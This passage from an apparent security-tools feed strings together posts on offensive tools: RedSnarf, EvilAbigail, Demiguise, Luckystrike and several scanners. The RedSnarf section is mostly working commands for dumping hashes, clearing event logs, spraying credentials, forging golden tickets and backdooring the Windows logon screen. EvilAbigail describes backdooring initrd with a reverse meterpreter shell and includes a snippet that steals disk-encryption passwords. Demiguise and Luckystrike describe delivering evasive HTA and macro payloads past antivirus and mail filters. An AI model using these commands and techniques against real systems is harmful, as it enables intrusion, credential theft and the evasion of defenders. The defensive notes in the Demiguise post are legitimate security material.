  • Results are saved on a per-host basis for analysis.
  • Enable/Disable RDP on a remote machine.
  • Change RDP port from 3389 to 443 on a remote machine.
  • Enable/Disable NLA on a remote machine.
  • Find where users are logged in on remote machines.
  • Backdoor Windows Logon Screen
  • Enable/Disable UAC on a remote machine.
  • Stealth mimikatz added.
  • Parsing of domain hashes
  • Ability to determine which accounts are enabled/disabled
  • Take a screen shot of a Remote logged on Active Users Desktop
  • Record Remote logged on Active Users Desktop
  • Decrypt Windows CPassword
  • Decrypt WinSCP Password
  • Get User SPN's
  • Retrieve WIFI passwords from remote machines

RedSnarf Usage
Requirements:
Impacket v0.9.16-dev - https://github.com/CoreSecurity/impacket.git
CredDump7 - https://github.com/Neohapsis/creddump7
Lsass Retrieval using procdump - https://technet.microsoft.com/en-us/sysinternals/dd996900.aspx
Netaddr (0.7.12) - pip install netaddr
Termcolor (1.1.0) - pip install termcolor
iconv - used with parsing Mimikatz info locally
Show Help
./redsnarf.py -h
./redsnarf.py --help

Retrieve Local Hashes
Retrieve Local Hashes from a single machine using weak local credentials and clearing the Security event log
./redsnarf.py -H ip=10.0.0.50 -uC security

Retrieve Local Hashes from a single machine using weak local credentials and clearing the application event log
./redsnarf.py -H ip=10.0.0.50 -uC application

Retrieve Local Hashes from a single machine using local administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d .

Retrieve Local Hashes from a single machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com

Retrieve Hashes across a network range using local administrator credentials
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d .

Retrieve Hashes across a network range using domain administrator credentials
./redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com

Retrieve Hashes across a network range using domain administrator credentials
./redsnarf.py -H file=targets.txt -u administrator -p Password01 -d yourdomain.com


Hash Spraying
Spray Hashes across a network range
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d .

Retrieve Hashes across a network range domain login
./redsnarf.py -H range=10.0.0.1/24 -hS credsfile -d yourdomain.com

Quickly Check Credentials
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password1 -d . -cQ y

Quickly Check File containing usernames (-hS) and a generic password (-hP)
./redsnarf.py -H ip=10.0.0.1 -hS /path/to/usernames.txt -hP PasswordToTry -cQ y


Retrieve Domain Hashes
Retrieve Hashes using drsuapi method (Quickest)
This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hI y (-hQ y)

Retrieve Hashes using NTDSUtil
This method supports an optional flag of -q y which will query LDAP and output whether accounts are live or disabled
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hN y (-hQ y)

Golden Ticket Generation
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -hT y


Information Gathering
Copy the Policies and Scripts folder from a Domain Controller and parse for password and administrator
./redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -uP y

Decrypt Cpassword
./redsnarf.py -uG cpassword

Find User - Live
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eL user.name

Find User - Offline (searches pre downloaded information)
/redsnarf.py -H range=10.0.0.1/24 -u administrator -p Password01 -d yourdomain.com -eO user.name

Display NT AUTHORITY\SYSTEM Tasklist
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eT y

Screenshot the Desktop of a Remote Logged on Active User
/redsnarf.py -H ip=10.0.0.1 -u administrator -p Password01 -d yourdomain.com -eS y


Misc
Start a Shell on a machine using local administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -uD y

Start a Shell on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uD y

Retrieve a copy of lsass for offline parsing with Mimikatz on a machine using local administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d . -hL y

Run stealth mimikatz, this option fires up a web-server to serve a powershell script, this is obfusctaed and encoded machine side, data doesnt touch disk - creds are grepped for in an easy to read style and echoed back to screen.
./redsnarf.py -H ip=192.168.198.162 -u administrator -p Password01 -cS y -hR y

Run Custom Command
Example 1
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'net user'

Example 2 - Double Quotes need to be escaped with \
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uX 'dsquery group -name "domain admins" | dsget group -members -expand'

Local Access Token Policy
Creates a batch file lat.bat which you can copy and paste to the remote machine to execute which will modify the registry and either enable or disable Local Access Token Policy settings.
./redsnarf.py -rL y

Wdigest
Enable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW e

Disable UseLogonCredential Wdigest registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW d

Query UseLogonCredential Wdigest registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rW q

UAC
Enable UAC registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU e

Disable UAC registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU d

Query UAC registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rU q

Backdoor - Backdoor Windows Screen - Press Left Shift + Left Alt + Print Screen to activate
Enable Backdoor registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB e

Disable Backdoor registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB d

Query Backdoor registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rB q

AutoLogon
Enable Windows AutoLogon registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA e

Disable Windows AutoLogon registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA d

Query Windows AutoLogon registry value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rA q

Lock a remote machine user session using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uL y


RDP
Enable RDP on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR e

Disable RDP on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR d

Query RDP status on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rR q

Change RDP Port from 3389 to 443 - Change RDP Port to 443 on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT e

Change RDP Port to default of 3389 on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT d

Query RDP Port Value on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rT q

Enable Multi-RDP with Mimikatz
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -uR y

Enable RDP SingleSessionPerUser on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM e

Disable RDP SingleSessionPerUser on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM d

Query RDP SingleSessionPerUser status on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rM q


NLA
Enable NLA on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN e

Disable NLA on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN d

Query NLA status on a machine using domain administrator credentials
./redsnarf.py -H ip=10.0.0.50 -u administrator -p Password01 -d yourdomain.com -rN q



EvilAbigail - Automated Linux Evil Maid Attack

August 31, 2017, 2:30 pm
$
0
0
Automated Linux evil maid attack

Scenario
  • Laptop left turned off with FDE turned on
  • Attacker boots from USB/CD/Network
  • Script executes and backdoors initrd
  • User returns to laptop, boots as normal
  • Backdoored initrd loads:
    • (Debian/Ubuntu/Kali) .so file into /sbin/init on boot, dropping a shell
    • (Fedora/CentOS) LD_PRELOAD.so into DefaultEnviroment, loaded globally, dropping a shell.

Supported Distros
  • Ubuntu 14.04.3
  • Debian 8.2.0
  • Kali 2.0
  • Fedora 23
  • CentOS 7

Current Features
  • python/meterpreter/reverse_https to compile time LHOST
  • FDE decryption password stored in meterpreter environment (getenv PASSWORD)

Details

Compiling
See the Makefile for more information/configuration, LHOST is required in the environment to build the .so as msfvenom is piped in at compile time. It is also necessary to have libcrypsetup-dev (or equivalent) installed on the build machine.
Generic Instructions (builds iso image in cwd): LHOST=192.168.56.101 make rev.so iso

isolinux.cfg
The following options have been appended to the kernel boot:
mc superuser nodhcp quiet loglevel=0
Furthermore, the prompt value has been set to 0 to allow fully automated execution.

Timing
Approximate nefarious boot -> backdoored time: ~2 minutes Approximate legit boot -> shell ~90 seconds (configurable, we want networking up before us)

Prerequisites
core.d is an unpacked core.gz from TinyCore with the below packages merged in.
Core-current is an unpacked Core-current.iso
The following packages have been installed inside tinycore (python, filesystem support):
  • bzip2-lib.tcz
  • filesystems-3.16.6-tinycore.tcz
  • gdbm.tcz
  • libffi.tcz
  • mtd-3.16.6-tinycore.tcz
  • ncurses.tcz
  • openssl.tcz
  • python.tcz
  • readline.tcz
  • sqlite3.tcz

Adding new signatures
At a minimum signature is as follows:
"exampleOS" : {
    "IDENTIFIER" : "grep EXAMPLEOS etc/initrd-release",
    "ROOT" : "${rootmnt}",
    "FILENAME" : "/ldlinux.so.1",
    "INITRDFILENAME" : "hda1"
}
  • exampleOS is a unique name for this OS.
  • IDENTIFIER is a shell command that has an exit code 0 when run against the correct initrd, and !0 for anything else.
  • ROOT is the full path or variable where the new root is mounted after decryption.
  • FILENAME is the full path to drop our binary on the root fs. Take care to know what initrd mounts and what is mounted later on.
  • INITRDFILENAME is the full path of the binary inside the initrd. This is copied inside Makefile (cp ... core.d/...) so it should match that.
After that, every triple of *FILE, *PRE, *POST is run against the initrd as a re.sub (e.g re.sub(*PRE, *POST, *FILE). The contents of *PRE and *POST are expanded using .format(**config[detectedOS]), so feel free to expand your signature to inject items.
There is no limit to the number of replacements you can run.

Notes
  • \\1 will expand to the full contents of the match (*PRE) when used inside the replace (*POST).
  • Be careful with: | $

Nitty Gritty

Payload
The python/meterpreter/reverse_httpsmetasploit payload was chosen because it is more platform independant than the linux/*/meterpreter/reverse_tcp payloads. python seems to be installed by default on all the tested systems.
By default, the payload is generated at compile time and piped into the .c file as a #define. This makes iterations easier, but it shouldn't be hard to save the payload and insert it manually.

Debian based (Debian, Ubuntu, Kali)

Dropping the shell
Debian based systems (Debian, Ubuntu etc) use a standard gzipped cpio image as the initramfs. This contains the default /init script which runs through preparing the system for full boot. This includes asking the user for their password and mounting the encrypted root fs.
For dropping our .so, we wait until the root filesystem has been mounted (so after the user has been asked for their password) and copy the .so to the /dev filesystem. The /dev filesystem was chosen as it is accessible just before the rootfs is switched and it is a ram based mount. This means that our .so won't touch disk.
To actually use the dropped .so, we then use the LD_PRELOAD environmental variable on the switch_root call. This variable is passed to all child executables and as such, the final /sbin/init script will have the module loaded. To keep this relatively quiet, we check if we are loaded into /sbin/init, and if so, we unset the LD_PRELOAD variable and delete the .so. This functionality can easily be disabled if we wanted to hook specific applications.
To force execution of the .so, by default after loading, we use the gcc flag -Wl,-init,shell, where shell is our main function. This specifies which function we want to call on init of the .so. Think of this as an analogue to Windows' DllMain.

Password stealing
The part of the init script in charge of asking the user for their password and mounting the root filesystem is as follows:
scripts/local-top/cryptroot:
if [ ! -e "$NEWROOT" ]; then
        if ! crypttarget="$crypttarget" cryptsource="$cryptsource" \
             $cryptkeyscript "$cryptkey" | $cryptcreate --key-file=- ; then
                message "cryptsetup: cryptsetup failed, bad password or options?"
                continue
        fi
fi
The important part for us is where the output of $cryptkeyscript is piped into $cryptcreate. $cryptkeyscript is the password asker, and $cryptcreate is the disk mounter. This pipe makes it very easy for us to attack. We insert the following code where the pipe is to write out the password to the end of our .so:
(read P; echo -ne \\\\\\\\x00$P >> /OUR.SO; echo -n $P)
This will read the password into the variable $P, and both write it to the end of the .so and echo it out again. This code will be transparent for the purposes of $cryptkeyscript and $cryptcreate, but it will have the site effect of exfiltrating the password. We use \\\\\\\\x00 to prepend a null byte (accounting for many levels of shell escaping) to the password. This makes it much easier for our .so to read the password back, as it just needs to read backwards from the end of itself until it sees a null byte.
To provide this password to the attacker, it is used as an environmental variable in the invocation of the payload. This means that the attacker can just use the meterpreter command getenv PASSWORD to retrieve the password.

Artefacts
Due to the way the .so is being loaded, there will be references to it in both /proc/1/maps and /proc/1/environ.
The maps file is a list of loaded modules. The following excerpt shows the contents of this file. Note the (deleted), could potentially raise suspicion. However, unlike normal binaries, it is not possible to access the .so without directly carving it out of memory after it has been deleted.
7f9ee8a56000-7f9ee8a58000 r-xp 00000000 00:06 9264                       /dev/hda1 (deleted)
7f9ee8a58000-7f9ee8c57000 ---p 00002000 00:06 9264                       /dev/hda1 (deleted)
7f9ee8c57000-7f9ee8c58000 rw-p 00001000 00:06 9264                       /dev/hda1 (deleted)
The environ file is a NULL separated list of environmental variables at invocation. Because it is from invocation this means that any modifications we make at runtime (unsetting LD_PRELOAD) will not be reflected.
In both of these cases, becuase we can be hooked into any and all system processes, we could just hook the read(2) function and remove any references to ourselves.

Kali
Kali is sort of a special case. It has the chained cpio as mentioned below, but doesn't use systemd to boot. As such, the DRACUT OS rule has been generalized such that it extracts blindly, and then the second OS detection catches Kali.
If you add an OS with a cpio containing only kernel/x86/microcode/GenuineIntel.bin, the IDENTIFIER rule should be for the appended cpio, as we will automatically find and extract it.

Redhat Based (Fedora, CentOS)
These systems have a different format for their initrd image compared to Debian based systems. The initrd files stored in /boot are an almost empty cpio archive, with a gzipped cpio archive appended. This second archive is the one containing the initramfs. To unpack this second archive it is necessary to parse the first cpio archive to find the end. Alternatively you can find the string TRAILER!!! and read on until you find gzip magic (\x1f\x8b).
Another difference of these systems is that they are systemd based, and as such the /init executable in the initamfs is a symlink to the systemd binary, rather than a flat sh script. To bypass this limitation, it is necessary to modify the .service files related to mounting the root filesystem.
The usr/lib/systemd/system/initrd-switch-root.service contains the script which is used to pivot to the newly decrypted root. Using the ExecStartPre pragma it is possible to execute other programs before the pivot takes place.
SELinux is present on CentOS, restricting the use of LD_PRELOAD. One working path is /lib. This was located by reading the file at /etc/selinux/targeted/modules/active/file_contexts for a system_u:object_r:lib_t labelled location.

Dropping the shell
Because systemd calls clearenv() before switching root, our LD_PRELOAD variable is wiped out. To bypass this, we can hook clearenv(), and always just replace the environment with only LD_PRELOAD. However, to achieve this, we need to be PID 1 inside the initrd. This is trickier as it is not possible to LD_PRELOAD into this process. To get around this, we have replaced /init with a bash shell script as follows:
#!/bin/bash
export LD_PRELOAD=/hda1
exec /usr/lib/systemd/systemd
This works becuase /init is just a symlink to /usr/lib/systemd/systemd. exec is used so that the process retains the parend PID (1).
Once this is impemented, and clearenv() is neutralised, it is possible to set LD_PRELOAD for the real pid 1 inside the new root.

Password Stealing
systemd handles passwords for encrypted filesystems completely differently to Debian based init scripts. The passwords are passed around using Unix sockets which allow you to send credentials. To get around this complexity, the easiest method We found to access the password was to hook the crypt_activate_by_passphrase function from libcryptsetup. The relevant parts of the function declaration are as follows:
int crypt_activate_by_passphrase(..., const char *passphrase, size_t passphrase_size, ...);
To access the password we simply hook this function, save passphrase to a file and call the original function obtained by dlsym(RTLD_NEXT, ...). As above, we appended our password to the .so so it is able to parse itself and make the password available to meterpreter.

Artefacts
As above, the .so shows up in /proc/1/maps, /proc/1/environ and ps output.


BlackArch Linux v2017.08.30 - Penetration Testing Distribution

September 1, 2017, 7:30 am
$
0
0

BlackArch Linux is an Arch Linux-based distribution for penetration testers and security researchers. The repository contains 1859tools. You can install tools individually or in groups. BlackArch Linux is compatible with existing Arch installs.

ChangeLog:

  • added more than 50 new tools
  • bugfix: strap.sh (removed 'http:' for pgp keyserver)
  • updated blackarch installer to version 0.5.2 (update: sha1 sum of strap.sh)
  • include kernel 4.12.8
  • updated a lot of blackarch tools
  • updated all system packages
  • update all window manager menus (awesome, fluxbox, openbox)

Download and Installation

BlackArch Linux only takes a moment to setup.
There are three ways to go:

  1. Install on an existing Arch machine.
  2. Use the live ISO.
  3. The live ISO comes with an installer (blackarch-install). You can use the installer to install BlackArch to your hard disk.

Tulpar - Web Vulnerability Scanner

September 1, 2017, 2:00 pm
$
0
0

Tulpar is a open source web vulnerability scanner for written to make web penetration testing automated.

Features
  • Sql Injection (GET Method)
  • XSS (GET Method)
  • Crawl
  • E-mail Disclosure
  • Credit Card Disclosure
  • Whois
  • Command Injection (GET Method)
  • Directory Traversal (GET Method)
  • File Include (GET Method)
  • Server Information
  • Technology Information
  • X-Content-Type Check
  • X-XSS-Protection Check
  • TCP Port Scanner
  • robots.txt Check
  • URL  Encode
  • Certification Information
  • Available Methods
  • Cyber Threat Intelligence
  • IP2Location
  • File Input Available Check

Installation
git clone https://github.com/anilbaranyelken/tulpar.git
cd tulpar
pip install ir requirments


Usage
python tulpar.py action web_URL
  action      Action: full xss sql fuzzing e-mail credit-card whois links
              portscanner urlEncode cyberthreatintelligence commandInjection
              directoryTraversal fileInclude headerCheck certificate method
              IP2Location FileInputAvailable
  web_URL     URL

Screenshots
Usage:SQL

Usage:mail


Search

WSSiP - Application for capturing, modifying and sending custom WebSocket data from client to server and vice versa

September 2, 2017, 7:30 am
$
0
0

Short for "WebSocket/Socket.io Proxy", this tool, written in Node.js, provides a user interface to capture, intercept, send custom messages and view all WebSocket and Socket.IO communications between the client and server.
Upstream proxy support also means you can forward HTTP/HTTPS traffic to an intercepting proxy of your choice (e.g. Burp Suite or Pappy Proxy) but view WebSocket traffic in WSSiP. More information can be found on the blog post.
There is an outward bridge via HTTP to write a fuzzer in any language you choose to debug and fuzz for security vulnerabilities.

Installation

From Packaged Application
See Releases.

From npm/yarn (for CLI commands)
Run the following in your command line:
npm:
# Install Electron globally
npm i -g electron@1.7

# Install wssip global for "wssip" command
npm i -g wssip

# Launch!
wssip
yarn: (Make sure the directory in yarn global bin is in your PATH)
yarn global add electron@1.7
yarn global add wssip
wssip
You can also run npm install electron (or yarn add electron) inside the installed WSSiP directory if you do not want to install Electron globally, as the app packager requires Electron be added to developer dependencies.

From Source
Using a command line:
# Clone repository locally
git clone https://github.com/nccgroup/wssip

# Change to the directory
cd wssip

# If you are developing for WSSiP:
# npm i

# If not... (as to minimize disk space):
npm i electron@1.7
npm i --production

# Start application:
npm start

Usage
  1. Open the WSSiP application.
  2. WSSiP will start listening automatically. This will default to localhost on port 8080.
  3. Optionally, use Tools > Use Upstream Proxy to use another intercepting proxy to view web traffic.
  4. Configure the browser to point to http://localhost:8080/ as the HTTP Proxy.
  5. Navigate to a page using WebSockets. A good example is the WS Echo Demonstration.
  6. ???
  7. Potato.

Fuzzing
WSSiP provides an HTTP bridge via the man-in-the-middle proxy for custom applications to help fuzz a connection. These are accessed over the proxy server.
A few of the simple CA certificate downloads are:

Get WebSocket Connection Info
Returns whether the WebSocket id is connected to a web server, and if so, return information.
  • URL
    GET http://mitm/ws/:id
  • URL Params
    id=[integer]
  • Success Response (Not Connected)
    • Code: 200
      Content:{connected: false}
  • Success Response (Connected)
    • Code: 200
      Content:{connected: true, url: 'ws://echo.websocket.org', bytesReceived: 0, extensions: {}, readyState: 3, protocol: '', protocolVersion: 13}

Send WebSocket Data
Send WebSocket data.
  • URL
    POST http://mitm/ws/:id/:sender/:mode/:type?log=:log
  • URL Params
    Required:
    id=[integer]
    sender one of client or server
    mode one of message, ping or pong
    type one of ascii or binary (text is an alias of ascii)
    Optional:
    log either true or y to log in the WSSiP application. Errors will be logged in the WSSiP application instead of being returned via the REST API.
  • Data Params
    Raw data in the POST field will be sent to the WebSocket server.
  • Success Response:
    • Code: 200
      Content:{success: true}
  • Error Response:
    • Code: 500
      Content:{success: false, reason: 'Error message'}

sdnpwn - An SDN Penetration Testing Toolkit

September 2, 2017, 2:23 pm
$
0
0

The Open Networking Foundation defines SDN as “The physical separation of the network control plane from the forwarding plane, and where a control plane controls several devices”. What this means is that the decision making which would traditionally be performed by a router or a switch (i.e. forwarding decisions), is moved to a central device known as a controller. Routers and switches become generic forwarding devices (also known simply as ‘switches’). These forwarding devices, or switches, communicate with the controller at the Southbound Interface (SBI) in order to receive instructions on how to forward network traffic. Applications may communicate with the controller at the Northbound Interface (NBI) to receive network statistics or influence traffic forwarding decisions.

sdnpwn is a toolkit and framework for testing the security of Software-Defined Networks (SDNs). 

Installation
First download sdnpwn using git
git clone https://github.com/smythtech/sdnpwn
Make the sdnpwn.py and setup.sh scripts executable
sudo chmod +x sdnpwn.py
sudo chmod +x setup.sh
The setup.sh script takes care installing software required for sdnpwn to function. Just run ./setup.sh and follow the instructions.
sudo ./setup.sh

Usage
Functionality in sdnpwn is divided into different modules. Each attack or attack type is available from a certain module.
Modules can be executed like so:
./sdnpwn.py <module name> <module options>
The mods module can be used to list all available modules:
./sdnpwn.py mods
More information about a certain module can be accessed using the info module:
./sdnpwn.py info mods
The above command would retrieve more information about the mods module, such as a description and available options.

Further Information
Check out https://sdnpwn.net for articles and tutorials on using various sdnpwn modules and the attacks they use.


D0xk1t - Web-based OSINT and Active Reconaissance Suite

September 3, 2017, 7:30 am
$
0
0

Active reconnaissance, information gathering and OSINT built in a portable web application.

1.0 Introduction
  1. What is this?
D0xk1t is an open-source, self-hosted and easy to use OSINT and active reconnaissance web application for penetration testers. Based off of the prior command-line script, D0xk1t is now fully capable of conducting reconnaissance and penetration testing for security researchers who need a framework without the head-scratching.
  1. Is this a website / web-app ?
Yes and no. In essence, it is not a typical website. D0xk1t is self-hosted. There is no server stack, cloud-based service, SaaS, etc. that is holding it up. You can have the option of deploying D0xk1t on a local network or deploying your own instance on any infrastructure/technology as you wish (although not recommended).
  1. Is this free?
Yes. D0xk1t will forever be open-source. If you wish to contribute, you can make a fork, add any changes, and send a pull request on Github.

2.0 Features
  • Easy-to-build, risk-free installation
  • Simple Bootstrap Admin Dashboard
  • Deployable to the Internet
  • Serverless (at the moment)
  • Expansive to any OS

3.0 Installation
Since D0xk1t is self-hosted, it does not work immediately out-of-box. It is recommended that you use a virtualenv container due to the sheer number of dependencies that can run into conflict with your Python configuration.

3.1 Building
Lucky for you, there are two ways to build D0xk1t. The quick 'n easy way, and the manual way.
Quick 'n Easy Way:
 $ curl https://raw.githubusercontent.com/ex0dus-0x/D0xk1t/master/extras/install | sudo /bin/bash
Manual Way:
$ git clone https://github.com/ex0dus-0x/D0xk1t && cd D0xk1t
$ # Start virtualenv if you wish
$ pip install -r requirements.txt
$ python run.py

3.2 Configuration
Open config.py. Here, you will see all the environmental variables that the application utilizes. Three important fields you MUST be aware of if you plan to deploy to the web.
GOOGLEMAPS_API_KEY = "YOUR_API_KEY_HERE"

SECRET_KEY = 'SECRET_KEY_HERE'
GOOGLEMAPS_API_KEY denotes the Google Maps API Key. This is essential for the GeoIP module. You can obtain it here and change the variable accordingly.
SECRET_KEY is the private key utilized by WTForm's CSRF protection feature. If deployed, change it to your liking.

3.3 Deployment
Once installed, run with python run.py. The application will run a first-time boot, and will then be accessible at 127.0.0.1:5000. Login with credentials, and you will be present with the admin panel.
Of course, this is self-hosting on localhost. Although work-in-progress, D0xk1t will soon support hosting on a variety of SaaS and server stacks of your choice.
  • Heroku - TODO: build a Procfile, as well as bash scripts for automatic deployment
  • ngrok - TODO: build a script for deployment to ngrok

4.0 Modules

D0x Module
The D0x module is a comprehensive info-gathering database that enables the pentester to write "D0x", or a file that holds a collection of data of a certain target, or targets. Using this data, the tester will be able to effectively understand their target, which is a critical point in the attacker's kill chain. D0xing is usually deemed malicious and black-hat in nature. However, with the D0x module, we aim to help security researchers gain momentum when conducting in-the-field pentesting.
The D0x module does come with several features, improved upon based off of the prior revision.
  • Secure database support, with delete and export (as .csv) options

GeoIP Module
When working with metadata, IP addresses often pop up as a point-of-interest. Using Maxmind and Google Map's APIs, the GeoIP module aims to collect geolocation information on public IP addresses, in order to gather data on physical location during the reconnaissance stage of the killchain.
  • Google Maps support for accurate GeoIP visualization
  • API endpoint support for command-liners or developers.

Demiguise - HTA Encryption Tool for RedTeams

September 3, 2017, 2:30 pm
$
0
0
What does it do?
The aim of this project is to generate .html files that contain an encrypted HTA file. The idea is that when your target visits the page, the key is fetched and the HTA is decrypted dynamically within the browser and pushed directly to the user. This is an evasion technique to get round content / file-type inspection implemented by some security-appliances. This tool is not designed to create awesome HTA content. There are many other tools/techniques that can help you with that. What it might help you with is getting your HTA into an environment in the first place, and (if you use environmental keying) to avoid it being sandboxed.

How does it do it?
This is achieved by encrypting the HTA file using RC4, and then using navigator.msSaveBlob to "save" the file at runtime - rather than fetching the HTA directly from the server. Meaning that at no point is there any HTTP request/response that contains your HTA file in a plain-text form - the proxy will simply see a text/html file containing your encrypted blob. In the latest version of Edge, this will result in the user being prompted to "run" the HTA.
Although not the primary aim of this tool, there are a couple of payload-options for the underlying HTA. Each option uses different techniques as previously documented by Matt Nelson, Matthew Demaske, Ryan Hanson and Etienne Stalmans. The benefit of using these techniques is that your code does not execute as a child of mshta.exe. As mentioned previously, the content of the HTA is not the primary aim of this tool. I'd encourage you to modify the HTA template to contain your own custom code :)

How do I run it?
Run the demiguise.py file, giving it your encryption-key, payload-type, output file-name and command that you want the HTA run.
Example: python demiguise.py -k hello -c "notepad.exe" -p Outlook.Application -o test.hta



Environmental Keying
In order to evade sandboxes, you shouldn't embed your key directly in the HTA. Instead you should get this dynamically from the environment the target is based in. An example of this may be to use the client's external IP address as a key. The benefit of this is that if the code is run in a 3rd-party sandbox, the HTA will not decrypt. In fact, the file-name will not even decrypt, meaning that nobody will know what your payload is/does :)
Some examples of environmental keying are given in examples/externalip.js and examples/virginkey.js.

Bonus
Since the tool outputs an HTML file containing JavaScript, you can simply take this JS and host it wherever you like. This means that if your client's website is vulnerable to reflected-XSS, you can use this to serve your HTA file from their (highly trusted) domain.
Also, Outlook doesn't block .html attachments by default , and neither do some other applications - use your imagination! :)

Detection
Currently it is not detected on VT:
https://www.virustotal.com/en/file/24b86ee6210b2abc446021feacfe25502b60403455aa24a32c80b2e7b0f81a70/analysis/1499880541/

Defense
Although obfuscation techniques may be hard to signature, one way to defend against HTA attacks is to prevent the HTA itself from being able to run in the first place. This can be achieved either through the use of Software Restriction Policy (SRP), Device Guard (on Windows 10 and Server 2016), or by changing the default file-handler associated with .hta files.
Please note that these changes may potentially affect the running of software that relies on HTA execution. Therefore it is recommended that a fix is fully tested in your own environment.

Using SRP:


Changing the default file-handler:
ftype htafile=%SystemRoot%\system32\NOTEPAD.EXE %1




Changing it back (x64):
ftype htafile=C:\Windows\SysWOW64\mshta.exe "%1" {1E460BD7-F1C3-4B2E-88BF-4E770A288AF5}%U{1E460BD7-F1C3-4B2E-88BF-4E770A288AF5} %*


Luckystrike - A PowerShell based utility for the creation of malicious Office macro documents

September 4, 2017, 7:30 am
$
0
0

PowerShell based utility for the creation of malicious Office macro documents. To be used for pentesting or educational purposes only.

Luckystrike is a menu-drive (SET style) PowerShell-based generator of malicious .xls and .doc documents. All your payloads are saved into a database for easy retrieval & embedding into a new or existing document. Luckystrike provides you several infection methods designed to get your payloads to execute without tripping AV. See the "Installation" section below for instructions on getting started.

DerbyCon 6.0 Tool Drop Talk: https://www.youtube.com/watch?v=1Yzg1xps2kE

InstallationRequirements
  1. Windows 7/10 (preferably x64)
  2. PowerShell v5+
  3. Microsoft Office 2010+ installed
To install, execute the following command from an administrative PowerShell prompt (Required to install the PSSQLite module). A luckystrike directory will be created automatically.
iex (new-object net.webclient).downloadstring('https://git.io/v7kbp')
To run, simply cd to the luckystrike directory, then .\luckystrike.ps1

 Uprgrading

Luckystrike will check for updates upon opening. You will be prompted to update. Any templates and payloads you have in the database are preserved.


Viewing all 5816 articles
Browse latest View live
Search
<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>